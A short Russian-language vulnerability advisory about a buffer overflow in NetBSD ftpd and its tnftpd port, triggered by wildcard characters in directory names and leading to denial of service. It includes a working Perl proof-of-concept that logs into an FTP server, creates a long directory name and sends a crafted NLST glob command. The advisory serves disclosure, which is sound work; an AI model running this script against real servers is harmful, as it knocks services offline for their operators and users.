Программа: NetBSD ftpd/tnftpd

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в NetBSD ftpd и порту tnftpd, являющимся портом NetBSD FTP сервера для других систем и имеющим многие улучшения по сравнению с традиционным BSD ftpd. Атакующий может создать директории, используя специальные универсальные символы (такие как STARS), обработка которых уязвимыми приложениями приведет к переполнению буфера и отказу системы в обслуживании.

Пример:

use IO::Socket;

$sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
PeerPort => '21',
Proto => 'tcp');
$c = "C";
$a = "C" x 255;
$d = "A" x 450;

print $sock "USER kcope\r\n";
print $sock "PASS remoteroot\r\n";
$x = <stdin>;
print $sock "MKD $a\r\n";
print $sock "NLST C*/../C*/../C*/../$d\r\n";
print $sock "QUIT\r\n";

while (<$sock>) {
print;
}



Оставить мнение